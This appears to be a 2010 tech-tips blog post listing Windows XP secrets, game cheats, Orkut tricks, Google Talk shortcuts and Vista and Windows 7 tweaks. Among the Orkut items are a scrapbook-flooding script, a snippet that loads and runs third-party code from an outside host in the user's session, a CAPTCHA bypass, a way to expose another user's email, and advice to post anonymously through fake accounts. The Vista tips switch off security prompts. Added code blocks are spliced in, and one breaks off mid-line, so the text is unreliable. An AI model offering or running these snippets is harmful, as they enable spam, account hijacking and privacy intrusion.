WARNING/DISCLAIMER

The Author/Blogger shall hold no liability for special, incidental, or consequential damages arising out of or resulting from the use or misuse of the information in this Blog. These articles are strictly for learning and awareness purposes. Most of the articles are collected from various sources, and many are the blogger's own, meant to help beginners and people who are interested in security systems and various IT purposes. Some of the articles are intended solely for IT professionals and systems administrators with experience servicing computers. They are not intended for home users, hackers, or computer thieves attempting to crack PCs. Please do not attempt any of these procedures if you are unfamiliar with computer hardware and software, and please use this information responsibly. Binod Narayan Sethi is not responsible for the use or misuse of this material, including loss of data, damage to hardware or personal injury. Information can help you to catch hackers, crackers and other cyber criminals. Information can help you to detect and manipulate the evil motives of these anti-social intellectual people. Good use of the information protects you from evil, and misuse of the information makes you evil/criminal. The author of this site will not be responsible for the use of this material for any illicit means or illicit act done by anybody by any means.

Binod Narayan Sethi


Saturday, June 12, 2010

XP Secrets

Defrag

Secret - Hidden Command Line Switch

Instructions - Go to "Start", "Run" and Type defrag c: -b to defragment the Boot and Application Prefetch information.

Notes - Windows XP will run this automatically every three days or so, during system idle periods. BootVis will evoke this when you run the "Optimize System" function. There is no need to manually run this unless you wish to immediately optimize a newly installed application's load time.


IExpress

Secret - Hidden Install Creator

Instructions - Go to Start, Run, type iexpress

Notes - IExpress is a technology designed to simplify creation of a setup program. Using the step-by-step IExpress Wizard, you can create self-extracting files that automatically run the setup program contained inside. The setup program can be an .inf file or an executable program. IExpress technology automatically removes the setup files after installation, saving the user time and frustration.


MS-DOS Editor

Secret - Hidden Text Editor

Instructions - Go to Start, Run, type edit

Notes - Windows XP comes with another text editor besides Notepad - it's called the MS-DOS Editor, and it's commonly referred to simply as Edit. It has features similar to Notepad, as well as additional features such as the ability to work with multiple text files and change the background and text colors.


Netmeeting

Secret - Hidden Internet Conference Application

Instructions - Go to Start, Run, type conf

Notes - Windows XP is the last version of Microsoft Windows to include NetMeeting. NetMeeting delivers a complete Internet conferencing solution for all Windows users with multi-point data conferencing, text chat, whiteboard, and file transfer, as well as point-to-point audio and video.


Notepad

Secret - Create a Log File

Instructions - Launch Notepad, type .LOG on the first line, and then press Enter to move to the next line. On the File menu, click Save As, type a descriptive name for your file in the File name box, and then click OK. When you next open the file, note that the date and time have been appended to the end of the log, immediately preceding the place where new text can be added. You can use this functionality to automatically add the current date and time to each log entry.


Paint

Secret - Image Trails

Instructions - Open an image and hold down Shift then drag the image around to create an image trail.

Secret - 10x Zoom

Instructions - Open an image and select the magnifying glass icon. Left-Click exactly on the line below the 8x.


Private Character Editor

Secret - Hidden Font Editor

Instructions - Go to Start, Run, type eudcedit

Notes - You can use Private Character Editor to create unique letters and logos for your font library.


Windows Chat

Secret - Hidden Windows Chat Program

Instructions - Go to Start, Run, type winchat

Notes - You can use Windows Chat on your computer to communicate with someone on another computer. Both computers must be connected to the same network (for example, a local area network [LAN] or the Internet). Also, each computer must be running a similar protocol, such as TCP/IP.


Windows Media Player 5.1

Secret - Hidden Windows Media Player

Instructions - Go to Start, Run, type mplay32


Windows Media Player 6.4

Secret - Hidden Windows Media Player

Instructions - Go to Start, Run, type mplayer2

Notes - Windows Media Player 6.4 (Classic) is installed along with Windows Media Player 7. The only update is that it now supports the latest codecs.


Game Secrets

FreeCell

Secret - Instant Win

Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.

Secret - Hidden Game Modes

Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.


Hearts

Secret - Show All Cards

Instructions - Go to Start, Run, Type: 'Regedit', OK. Edit this registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Hearts

Right click on the Hearts folder, select New, String Value and name it ZB. Right-click on ZB, select Modify and enter a Value Data of 42, OK and close Regedit. Start Hearts (not Internet Hearts). Once in a game Press Ctrl + Alt + Shift + F12 to show all the cards.

Background - This secret is a reference to Douglas Adams' book the Hitchhiker's Guide to the Galaxy. 'ZB' is the initials of the character Zaphod Beeblebrox, the Galactic President. '42' is the answer to The Ultimate Question Of Life, the Universe and Everything.


Minesweeper

Secret - Reveal Mines

Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either Shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change your desktop background to a solid color other than white or black to see the pixel.

Secret - Stop Timer

Instructions - Launch Minesweeper and start a game so the timer starts counting, then press the Windows Key + D to show the desktop. Now when you select minesweeper from the taskbar you can continue playing with the timer stopped.


Pinball

Secret - Extra Balls

Instructions - Type 1max at the start of a new ball to get extra balls.

Secret - Gravity Well

Instructions - Type gmax at the start of a new game to activate the Gravity Well.

Secret - Instant Promotion

Instructions - Type rmax at the start of a new game to go up in ranks.

Secret - Skill Shot

Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:

First: 15,000 points
Second: 30,000 points
Third: 75,000 points
Fourth: 30,000 points
Fifth: 15,000 points
Sixth: 7,500 points

Secret - Test Mode

Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around. While in test mode press the following keys for more secrets:

H - Get a 1,000,000,000 High Score
M - Shows the amount of system memory
R - Increases your rank in game
Y - Shows the Frames/sec rate

Secret - Unlimited Balls

Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting the game.


Solitaire

Secret - Instant Win

Instructions - Press Alt + Shift + 2 during game play to instantly win.

Secret - Draw single cards in a Draw Three game

Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.


OS Secrets

Add/Remove

Secret - Hidden Uninstall Options

Instructions - Warning: Proceed at your own risk! Browse to C:\Windows\inf\ and make a backup copy of sysoc.inf. Then open the original file C:\Windows\inf\sysoc.inf in notepad. Go to "Edit" and select "Replace". In "Find what:" type ,hide and in "Replace with:" type , then select "Replace All", save and close the file. Go to the "Control Panel", "Add/Remove", select "Add/Remove Windows Components". You will now see many more Windows components to uninstall. Do not remove anything with no label or that you do not recognize or fully understand what it does. Doing so can break certain functionality in Windows.


Control Panel

Secret - Hidden Control Panel Extensions

Instructions - Download and install TweakUI, launch, go to "Control Panel" and check any item not selected, then "Apply" and "OK". You will now see the hidden control panel extensions.


Device Manager

Secret - Hidden Devices

Instructions - Go to the "Control Panel", "System" icon, "Hardware" tab and select "Device Manager". Select "View" and Show hidden devices.

Secret - Phantom Devices

Instructions - Go to "Start", "Programs", "Accessories" and select "Command Prompt". At the command prompt, type "set devmgr_show_nonpresent_devices=1" and press Enter. At the command prompt, type "start devmgmt.msc" and press Enter. Select "View" and Show hidden devices. You can see devices that are not connected to the computer.

Notes - When you close the command prompt window, Windows clears the "devmgr_show_nonpresent_devices=1" variable that you set and prevents phantom devices from being displayed when you select "Show hidden devices".


MIDI Files

Secret - Hidden MIDI Files

Instructions - Browse to C:\Windows\Media and you will find 3 hidden MIDI files:

flourish.mid
onestop.mid
town.mid

Notes - "MIDI" stands for "Musical Instrument Digital Interface" - A compression format for encoding music.


Music

Secret - Music from the Installer

Instructions - Browse to C:\Windows\system32\oobe\images\title.wma and play.

Notes - "OOBE" stands for "Out-of-Box Experience".


Shutdown

Secret - Display Hibernate Option on the Shut Down dialog

Instructions - Go to "Start", "Turn Off Computer..." and press either Shift key to change the "Stand By" button to "Hibernate".


Support Tools

Secret - Over 100 Windows XP Support Utilities are on the install CD

Instructions for Pre-SP2 users - If you do not have SP2 installed, put the original Windows XP CD in the CD-ROM Drive, run the D:\Support\Tools\setup.exe file.

Orkut tips and tricks

Show a cool STAR in your scraps: Just write "& # 9 7 3 3" without spaces and quotes in the scrap text box, directly in your friend’s scrapbook, and submit your scrap. You will see a cool star icon showing up in your scrap. It is one of the simplest of orkut tricks, isn’t it?

Unlimited pictures in orkut album : By default an orkut user can upload only 12 pictures in orkut album. Sometimes, we have a lot of pictures to show in our orkut album but due to this restriction on number of picture uploads we could not show all we want to show in our orkut album. But now you can show unlimited number of pictures and photos using the new rss feed feature in orkut.

Sending a blank or invisible scrap

Open your friend’s scrapbook and write any one of the tags from the list given below:

[i], [u], [b], [i][u], [i][b], [u][i], [u][b], [u][i][b], [i][u][b], [i][u][b][i]

Now press the ‘postscrap’ tab.

Accessing orkut from a place where it has been banned

You can use proxies like http://www.proxut.com and http://www.orkutlive.info/ to access orkut.

Adding images to orkut scraps

You can send images to your friend through scrap. But the condition is that urls of those images should have .jpg, .gif, .png or .bmp in their ending.

For example, copy and paste “http://www.desiclub.com/bollywood/photo_album/photoalbums/aamir_khan/aamir3.jpg” in the scrapbook and then press ‘postscrap’. Now you will see the image as a scrap in your scrapbook.

Hiding your visits on the other’s profiles.

1) Go to ‘Setting’.
2) Click on ‘privacy’ tab and select hide profile visit.

See large display pic of your friend in your scrapbook

Copy and paste this code in the address bar:

javascript:document.body.innerHTML=document.body.innerHTML.replace(/small/g,"medium");void(0)

want to scrap like this
[̲̅h̲̅a̲̅i̲̅ ̲̅f̲̅r̲̅i̲̅e̲̅n̲̅d̲̅s̲̅ ̲̅h̲̅o̲̅w̲̅ ̲̅u̲̅ ̲̅d̲̅o̲̅i̲̅n̲̅g̲̅.̲̅.̲̅?̲̅]

1 Copy code and go to the profile of the person whom u want to scrap
2 Paste the code in that address bar and
3 Type the message u want to send and
4 Press the GO button and
5 Press the POST SCRAP button...

---------------------------------------------------------------------------------
javascript:var byX9=document.getElementsByTagName('textarea')[0];byX9.value="["+byX9.value.replace(/(?:)/g,"̲̅")+"]";void(0);
---------------------------------------------------------------------------------
thanx to the creator

Creator Of Orkut
Hey friends check out the profile of orkut creator
Here's the Link to His Profile :

http://www.orkut.com/Profile.aspx?uid=325082930226142255

---------------------------------------------------------------------------------
Google maps in orkut
http://www.orkut.com/Map.aspx
Upon clicking on the link you will be able to see where your friends are located around the world (provided they filled out their details correctly).
Upon clicking on a group or a person, you will be able to see your friend's address, profile link and photo (provided they filled out their details correctly).
---------------------------------------------------------------------------------
ITS NOT GOOGLE.... ITS UR NAME!!!
Go to google and write goglogo in search box and hit enter...
make the first page as ur home page and then open the site write ur name
now u made ur own search site...........
---------------------------------------------------------------------------------
Google Trick
Nobody knows whether it's a mistake or google purposely made this. Anyway, try this.........
1-Go to Google
2-Type the word "Failure" in the search box (dont put quotes)
3-Instead of clicking "Google Search," click "I'm Feeling Lucky."
---------------------------------------------------------------------------------
Send scrap to all ur friends at once
Install Google Pack. its absolutely FREE
Google Pack is available for free download from this Blog..
---------------------------------------------------------------------------------
Enlarge ur photo
javascript:i=128;void(setInterval("i++;document.images[2].width=i",5))

just copy paste it in ur address bar and press enter
after preview click refresh
---------------------------------------------------------------------------------
Skins for orkut
Hey friends,got bored with same blue orkut background???
wanna change the way your orkut looks??
but the problem is its GREASEMONKEY codes and its for FIREFOX users only...
so if you don't have FIREFOX get it first!!!
Google is now providing FIREFOX with GOOGLE TOOLBAR get it now
and inform me as comment with ur mail id.. i will send u the link....
---------------------------------------------------------------------------------
Shake ur friends orkut page
javascript:function flood(n) {if (self.moveBy) {for (i = 35; i > 0; i--) {for (j = n; j > 0; j--) {self.moveBy(1,i);self.moveBy(i,0);self.moveBy(0,-i);self.moveBy(-i,0); } } }} flood(6);

just copy paste it in ur address bar and press enter
---------------------------------------------------------------------------------
Add rainbow effects to ur scrap
SOURCE: http://inutilidades.hex.com.br/orkutTools/coloredText.php
On this page...
1. write ur text in first text box.....
2. Click the button below named "Aplicar Rainbow effect"
3. Copy and paste it anywhere u want
---------------------------------------------------------------------------------
Different format for ur name ,nickname....
Go to system tools in your system open accessories then character map there open for times new roman...there u will find all the possible fonts...
OR
Make Stylish Nick Names
SOURCE:http://www.orkutando.net/eng/generators/crazy_nick.php/
Type your nick and click on "Create", copy the result and paste it wherever you want to.
---------------------------------------------------------------------------------
How to make customised messages or scraps
Hey friends did u ever wondered where these wonderful messages are coming....
dont worry here is the solution.......... check this link
SOURCE:http://www.orkutando.net/eng/generators/heart.php/
On this page...
1. write ur word(better small words) in the box
2. Click the create button
3. Copy and paste it anywhere u want
---------------------------------------------------------------------------------
Invisible name, nickname ,scraps or missed call
simple way to make any thing invisible in orkut.
just hold "alt" and press "0173" from ur num pad and now release "alt"...... and submit
OR
just type [ i ] without spaces and an invisible scrap will b sent (empty scrap)
---------------------------------------------------------------------------------
Crazy scripts
just copy paste it in ur address bar and press enter

javascript:R=-1;DI=document.links;DIL=DI.length;function A(a,b,c){return Math.sin(R/350*6.28*b+a)*c+c}function B(a){DIS=DI.item(a).style;DIS.position='absolute';DIS.left=A(5,100,500);DIS.top=A(5.6,60,150)}setInterval('R++;B(R%DIL)',15);void(0)
---------------------------------------------------------------------------------
How to invert a scrap

& # 8 2 3 8
Type it without spaces b4 ur msg and submit ur message, will be inverted.................
---------------------------------------------------------------------------------
Worst Profile Of Orkut
Hai friends see the worst profile of orkut .... :)
http://www.orkut.com/Profile.aspx?2uid=6849219260034274333
---------------------------------------------------------------------------------
Invisible scrap
Write & n b s p ; without space.

Latest ScrapBook Flooding Script
Open the scrapbook, paste the JavaScript code in the address bar and click GO:
javascript:i=9874654;sar='Flooding by Shujaat Rukh \n Orkut New Flooding Script Available on Shargo.Net\n [silver]'; a=document.forms[0];a.action+='&Action.submit='; setInterval("i++; a.scrapText.value=sar+i; a.submit()",500);void(0)

Delete Your Own Scraps Script
Copy and paste this script in your ScrapBook address bar and hit GO:
javascript:i=0;mod=10;setInterval("i++;i=i%mod;document.forms[ i ].submit()",250);void(0);

If You Want To See All Pictures Of An Album In Full Size At One Time, Use This CODE on the album page:
javascript:d=document.body.innerHTML; m=d.match(/http:..images3.orkut.com.images.milieu.{1,99}jpg/gi); for(z=0;z<m.length;z++){document.write("<img src="+m[z]+">")};void(0)

This Code will Change your Display Pic into a bigger size
javascript:i=128;void(setInterval("i++;document.images[2].width=i",0))

This CODE Changes The Colour Of Your Home, Friends, Messages, Communities, Search, Media, News etc. links (Blue, Green & Yellow):
javascript: i=0; c=["green","blue","yellow"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0)

This Code Makes your Friends Display Pic Big
javascript:document.body.innerHTML=document.body.innerHTML.replace(/small/g,"medium");void(0)

---------------------------------------------------------------------------------
If you'd like to enable the safety filter, just follow these steps:

1.Click settings on the left sidebar of your orkut profile or homepage.
2.On the general tab, find the 'safety filter' section.
3.Select the bubble next to 'do not show inappropriate content.'
4.Don't forget to click the save changes button at the bottom of the page when you're done.
---------------------------------------------------------------------------------

1. Knowing a person email id in Orkut.

Ignore the person in orkut you want to know the Email id.
Open your Gtalk with same account as for Orkut.
Go to Settings -> Blocked. in gtalk
You will see the email id of that person.

2. Write Anonymous Scraps to anyone at orkut

Create a fake account at orkut
Write the scraps to the person you want.
Delete the account and your scraps will become anonymous at orkut.

3. Finding those who has a crush on you in orkut.

Add the one you think might have crush on you.
If that person have already added you to their crush list , you will get an email.
delete all from your crush list.

4. Write a Blank Scrap to anyone in orkut.

Delete everything in the text box field.
Now holding “alt” key down press 0 1 7 3 one after the other from left to right.
That's it, done.
Click Post Scrap or Submit.

5. Writing your text in reverse order at orkut.

Type your text in the scrapbook.
Type & # 8 2 3 8 without spaces before the message.
Click Submit or Post scrap.

6. How to bypass the verification image while posting a url in a scrapbook in orkut.

Change http to HtTp and www to wWw.
Now post the scrap
No Verification now needed.

---------------------------------------------------------------------------------

Add Rainbow Effects to Your Scraps
You can write colorful scraps by giving words different colors. If you are not good with tweaking code then just proceed to this online tool:http://inutilidades.hex.com.br/orkutTools/coloredText.php
and write there what you want to send as scrap and hit 'Aplicar Rainbow Effect'.
You can do it yourself also. If you want to colorize the text 'Colorful Message', Following pattern would be used.

[gold]C[/gold][lime]o[/lime][silver]l[/silver][blue]o[/blue][red]r[/red]
---------------------------------------------------------------------------------
Colorize Message and Insert Smilies in Scrap Message
This tool here is a text editor and will give you an option to write your scrap text and insert smilies by selecting any of those. You can select the text and click at the colors to colorize it. Next thing you wanna do is to copy that code and paste it as a scrap and hit post scrap button.

SOURCE:http://inutilidades.hex.com.br/orkutTools/formatText.php
---------------------------------------------------------------------------------

Create Heart With Any Text for Scrap Post
Social geeks love posting shapes and symbols made by combination of weird letters. Here is a tool which will help you create a big heart out of any text suggested by you. You can select that heart and post it in scrap.

SOURCE:http://inutilidades.hex.com.br/orkutTools/asciiHeart.php
---------------------------------------------------------------------------------

Scrap In Urdu Language
This tool is an Urdu editor and will type Urdu for you. You can copy Urdu written text from there and paste it in scraps.

SOURCE:http://www.techmynd.com/tools/write-in-Urdu.php
---------------------------------------------------------------------------------

Hide Your Visits on Other’s profiles
Go to 'Setting'
Click on 'privacy' tab and select 'hide profile visit'
---------------------------------------------------------------------------------
How to Make Your Name Blank/Invisible in Orkut
Click on 'edit profile'
Hold down "alt" key and press "0173" from your keyboard Num Pad.
Now release "alt"
Update profile
---------------------------------------------------------------------------------
Blinking orkut

Just copy paste this in your browsers address bar and hit enter.

javascript:i=0;c=["red","green","blue","yellow","magenta","orange","pink","violet"]; a=document.links;setInterval('i++;a[i % document.links.length].style.color=c[i % c.length]',10);void(0); alert("xmen_net ")

---------------------------------------------------------------------------------
check out the magical trick

Just copy paste this in your browsers address bar and hit enter.

javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3= 1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document. images; DIL=DI.length; function A(){for(i=0; i

---------------------------------------------------------------------------------
In Orkut.com, normally you can only send scraps to one person at a time.

This little script helps you to send scraps to all your friends quickly. You can even select which all friends you want to send the scrap to. Very useful for sending Christmas and New Year greetings to all your friends.
Here’s the script : -
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://www.fundazone.com/scripts/orkut-fundazone.com.js';void(0)
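
A way to see what an address-bar snippet like the ones on this page does before running it, as an added example that is not part of the original post: the function only reads the snippet text and reports whether it pulls code from another server, submits forms, runs on a timer or rewrites the page. The sample snippets, the host `scripts.example` and the default page host are constructed for illustration.

```javascript
// Added example: read-only triage of "paste this into the address bar" snippets.
// The snippet is never evaluated; only its text is inspected.

// Blogs often turn ' and " into typographic quotes, and javascript: URIs may be
// percent-encoded. Undo both so the patterns see what the browser would run.
function normalise(snippet) {
  let s = String(snippet).trim()
    .replace(/[\u2018\u2019]/g, "'")
    .replace(/[\u201C\u201D]/g, '"');
  try {
    s = decodeURIComponent(s);
  } catch (e) {
    // A bare % (for example the modulo operator) is not valid encoding: keep as typed.
  }
  return s;
}

// Behaviours worth knowing about before pressing Enter, in reporting order.
const RULES = [
  { id: 'remote-script',
    why: 'adds a <script> element whose code comes from another server',
    match: s => /createElement\(\s*['"]script['"]\s*\)/i.test(s) && /\.src\s*=/.test(s) },
  { id: 'auto-submit',
    why: 'submits a form on the page from code, acting as the logged-in user',
    match: s => /\.submit\s*\(/.test(s) },
  { id: 'timer-loop',
    why: 'keeps running on a timer after you press Enter',
    match: s => /set(Interval|Timeout)\s*\(/.test(s) },
  { id: 'page-rewrite',
    why: 'rewrites the page markup',
    match: s => /innerHTML\s*=|document\.write\s*\(/.test(s) },
];

// Hosts named in the snippet that are not the site it is pasted into.
function externalHosts(s, pageHost) {
  const hosts = new Set();
  for (const m of s.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    const host = m[1].toLowerCase();
    if (host !== pageHost.toLowerCase()) hosts.add(host);
  }
  return [...hosts];
}

// pageHost is the site whose session the snippet would run in (assumed default).
function triage(snippet, pageHost = 'www.orkut.com') {
  const s = normalise(snippet);
  const isJsUri = /^javascript:/i.test(s);
  const hits = isJsUri ? RULES.filter(r => r.match(s)) : [];
  const findings = hits.map(r => r.id);
  let risk = 'low';
  if (findings.includes('page-rewrite') || findings.includes('timer-loop')) risk = 'medium';
  // Third-party code or automatic posting runs with the user's own login.
  if (findings.includes('remote-script') || findings.includes('auto-submit')) risk = 'high';
  return {
    isJsUri,
    findings,
    reasons: hits.map(r => r.why),
    hosts: isJsUri ? externalHosts(s, pageHost) : [],
    risk,
  };
}

// Constructed samples modelled on the kinds of snippet this page lists.
const SAMPLES = {
  loader: 'javascript:d=document;c=d.createElement(\u2019script\u2019);d.body.appendChild(c);' +
          'c.src=\u2019http://scripts.example/all-friends.js\u2019;void(0)',
  resize: 'javascript:i=128;void(setInterval("i++;document.images[2].width=i",5))',
  submitLoop: 'javascript:i=0;mod=10;setInterval("i++;i=i%mod;document.forms[i].submit()",250);void(0);',
  encoded: 'javascript:document.forms%5B0%5D.submit()',
};

for (const [name, text] of Object.entries(SAMPLES)) {
  const r = triage(text);
  console.log(name.padEnd(11), r.risk.padEnd(7),
    r.findings.join(',') || '-', r.hosts.join(',') || '-');
}
```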
---------------------------------------------------------------------------------
The following are some of my collection regarding Orkut hacks

1) Zeetab (Orkut Star) – Computer World, Orkut Computer Tips and Tricks, Free SMS, Wallpaper, Mobile Software Game Ringtone Themes, Free games, Orkut Software, Bollywood wallpaper, MP3, FM Radio and many more

2) Thisisorkut.org (TIO) – This Is Orkut (T.I.O) was created to provide more info and help tracks to Orkut users for their convenience. Easy to use Java Scripts, Online Toolbars, Help References, Trouble shooters, and lot more….

3) CrazySouls.com – Crazy souls have created many orkut scripts and they are really useful and working. Not only scripts, they also provide stuff for MSN, Cheats and many more

4) Trickfriend.com – Here, on this website, you will find tips and tricks that will help in making your life easier on Orkut. This webpage also contains much software related to Orkut

5) Tools Home – This site is developed by a 15 yr old boy; it contains some cool stuff and software

6) ScrapMania.com – This site provides services like Messages, Generators, ASCII Art, Bar Arts, Images, Emotions, Smileys and many more

7) Orkut Underworld – This is a blog which has an awesome collection of orkut tips and tricks, software and many more. In short, a simple but useful blog

8) Orkutrix.com – In the world of Orkut tricks! You find only GENUINE and popular orkut tricks and scripts here. Browse through the menu for those tricks, but they also provide some hacking tricks for orkut

9) InsideOrkut.com – According to me this is the best of all because this website posts all the current information on orkut; it is very useful for beginners and also for everyone

10) OrkutPlus! – Orkut plus is really a Plus to Orkut they are providing Best Compilation of Orkut Hacks, Tips-Tricks and Cheat Scripts ! as they are publishing

11) Devils workshop – This blog contains not only tips and tricks for Orkut it also having some best collection for My space, You tube, Google, Ad sense, and many more. More over I like the labels cloud on that blog

12) Digital Me – this blog just started before 2 months but it contains wide range of softwares, Java scripts, GM scripts, etc..
---------------------------------------------------------------------------------

Google Talk Tips & Tricks

Some people say Google Talk is nice because of its minimalistic design, but they couldn't use an Instant Messenger that doesn't have smileys and font customization. Here are some tips that will make your work with Google Talk better.

Keyboard shortcuts

* CTRL + Mousewheel up/down: Change the font size in a conversation window.
* CTRL + E: Center text
* CTRL + R: Right justify text
* CTRL + L or CTRL+J: Left justify text
* F9: Open Gmail to send an email to the person you talk to
* F11: Start a call
* F12: Stop the current call
* ESC: Close the current window

Conversation

* Some smileys are converted by Google Talk: :-| :-O :-x :-P :-D ;-) :-( :-) B-) :'( :| :O :x :P :D :) :( :)
* To write bold text, type *your gtalk message*
* To write italic text, type _your gtalk message_

Startup parameters (go to Start/Run and type "c:\Program Files\Google\Google Talk\googletalk.exe" /one_parameter_from_the_list_below)

* /nomutex: allows you to open more than one instance of Google Talk.
* /register: write Google Talk settings in the registry.
* /checkupdate: check for new version.
* /factoryreset: revert to default settings.
* /mailto email@gmail.com: send an email with Gmail.
* /diag: start Google Talk in diagnostic mode.

Tweaks, Tips, and Tricks for Windows Vista

1. If you’re annoyed by Internet Explorer’s incessant barking that you’ve lowered your Security Settings (like, if you’re a non-paranoid expert), launch “gpedit.msc” from either the Run command or Start Search field, navigate through Local Computer Policy / Computer Configuration / Administrative Templates / Windows Components / Internet Explorer. In the rightmost pane, double-click “Turn off the Security Settings Check feature” and set it to Enabled.
2. If Internet Explorer’s Information Bar also annoys you, you can turn it off (again) in the Group Policy Object Editor (gpedit.msc) through Local Computer Policy / Computer Configuration / Administrative Templates / Windows Components / Internet Explorer / Security Features. In the rightmost pane, double-click “Internet Explorer Processes” and set it to Disabled. Hallelujah!
3. I’ve just mentioned two tweaks that are buried inside the Group Policy Editor. Jim Allchin pointed out that there’s a Group Policy Settings Reference spreadsheet available. Makes for great weekend reading.
4. Read the Background on Backgrounds if you’re a performance junkie. Don’t set your wallpaper through Internet Explorer ever again! Now that Windows supports JPG wallpapers, there’s absolutely no need (or excuse) for using BMPs anymore.
5. If you insist on keeping UAC (User Account Control) turned on for yourself, you might care to make the elevation prompts a bit less visually jarring. Brandon told me about this one, even though I have UAC turned off. Launch the Local Security Policy manager (secpol.msc), and navigate through Security Settings / Local Policies / Security Options. In the rightmost pane, scroll to the bottom and double-click “User Account Control: Switch to the secure desktop when prompting for elevation.” Disable it, and you can keep UAC turned on without getting turned off by the embarrassingly craptacular Aero Basic theme.
6. Vista can send you emails! The Computer Management tool can still be accessed by right-clicking “Computer” and selecting “Manage” from the menu. However, now you can attach a task to any event. Try navigating through System Tools / Event Viewer / Windows Logs / Application. Now, go ahead and select an event – then look to the rightmost pane and click “Attach Task to This Event.” Name it whatever, describe it however, click through the next step, then in the Action step, you’ll see the “Send an e-mail” option.
7. The Windows Task Manager gives you a lot more troubleshooting information in Vista. Flip to the Processes tab, and in the View menu, click “Select Columns” and add Description, Command Line, and Image Path Name. Moreover, when you right-click a process, you can select either “Go to Service(s)” or “Open File Location.” These are all long overdue options.
8. This one’s interesting. Open up the Date and Time Control Panel applet. Flip to the “Additional Clocks” tab. There, you can configure two more clocks from different time zones. They’ll appear in the tooltip when you hover over the Taskbar clock. No additional software (or silly sidebar widgets) necessary.
9. Applicable in other versions of Windows, I’m going to throw it in here for good measure. Create a shortcut to RegSvr32.exe in your SendTo folder. To get there quickly, enter “shell:sendto” in the Run command dialog or Start Search field. Now, when you wanna register a DLL or OCX file with the system, you can select it/them and “Send To” the RegSvr32 shortcut.
10. I figured I’d round out my first set of Windows Vista tips and tricks with a tiny bit of eye candy. It doesn’t beat Picasa, but the Windows Photo Gallery is better than nothing. Once it’s indexed all your photos, click the icon next to the Search field and turn on the “Table of Contents.” That’s kinda nifty.

Windows 7 tips, tricks and secrets

1. Problem Steps Recorder

As the local PC guru you're probably very used to friends and family asking for help with their computer problems, yet having no idea how to clearly describe what's going on. It's frustrating, but Microsoft feels your pain, and Windows 7 will include an excellent new solution in the Problem Steps Recorder.

When any app starts misbehaving under Windows 7 then all your friends need do is click Start, type PSR and press Enter, then click Start Record. If they then work through whatever they're doing then the Problem Steps Recorder will record every click and keypress, take screen grabs, and package everything up into a single zipped MHTML file when they're finished, ready for emailing to you. It's quick, easy and effective, and will save you hours of troubleshooting time.

2. Burn images

Windows 7 finally introduces a feature that other operating systems have had for years - the ability to burn ISO images to CDs or DVDs. And it couldn't be much easier to use. Just double-click the ISO image, choose the drive with the blank disc, click Burn and watch as your disc is created.

3. Create and mount VHD files

Microsoft's Virtual PC creates its virtual machine hard drives in VHD files, and Windows 7 can now mount these directly so you can access them in the host system. Click Start, type diskmgmt.msc and press Enter, then click Action > Attach VHD and choose the file you'd like to mount. It will then appear as a virtual drive in Explorer and can be accessed, copied or written just like any other drive.

Click Action > Create VHD and you can now create a new virtual drive of your own (right-click it, select Initialise Disk, and after it's set up right-click the unallocated space and select New Simple Volume to set this up). Again, you'll be left with a virtual drive that behaves just like any other, where you can drag and drop files, install programs, test partitioning software or do whatever you like. But it's actually just this VHD file on your real hard drive which you can easily back up or share with others. Right-click the disk (that's the left-hand label that says "Disk 2" or whatever) and select Detach VHD to remove it.

The command line DISKPART utility has also been upgraded with tools to detach a VHD file, and an EXPAND command to increase a virtual disk's maximum size. Don't play around with this unless you know what you're doing, though - it's all too easy to trash your system.

4. Troubleshoot problems

If some part of Windows 7 is behaving strangely, and you don't know why, then click Control Panel > Find and fix problems (or 'Troubleshooting') to access the new troubleshooting packs. These are simple wizards that will resolve common problems, check your settings, clean up your system and more.

5. Startup repair

If you've downloaded Windows 7 (and even if you haven't) it's a good idea to create a system repair disc straight away in case you run into problems booting the OS later on. Click Start > Maintenance > Create a System Repair Disc, and let Windows 7 build a bootable emergency disc. If the worst does happen then it could be the only way to get your PC running again.

6. Take control

Tired of the kids installing dubious software or running applications you'd rather they left alone? AppLocker is a new Windows 7 feature that ensures users can only run the programs you specify. Don't worry, that's easier to set up than it sounds: you can create a rule to allow everything signed by a particular publisher, so choose Microsoft, say, and that one rule will let you run all signed Microsoft applications. Launch GPEDIT.MSC and go to Computer Configuration > Windows Settings > Security Settings > Application Control Policies > AppLocker to get a feel for how this works.
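To show what a single publisher rule does in practice, here is an added example (not from the original article and not Microsoft's code) that reads a policy in AppLocker's XML export format and decides whether files may run. The policy, the rule Id and the three file descriptions are constructed; the model covers only publisher rules in the Exe collection and ignores the user/group SID and rule exceptions.

```python
import xml.etree.ElementTree as ET

# Constructed policy in AppLocker's XML export format: one rule that allows
# every executable signed by a single publisher, as the tip describes.
POLICY_XML = """
<AppLockerPolicy Version="1">
  <RuleCollection Type="Exe" EnforcementMode="Enabled">
    <FilePublisherRule Id="00000000-0000-0000-0000-000000000001"
        Name="Signed by Microsoft" Description="" UserOrGroupSid="S-1-1-0" Action="Allow">
      <Conditions>
        <FilePublisherCondition
            PublisherName="O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US"
            ProductName="*" BinaryName="*">
          <BinaryVersionRange LowSection="*" HighSection="*" />
        </FilePublisherCondition>
      </Conditions>
    </FilePublisherRule>
  </RuleCollection>
</AppLockerPolicy>
"""

# Constructed file descriptions (publisher is None for an unsigned file).
SAMPLE_FILES = {
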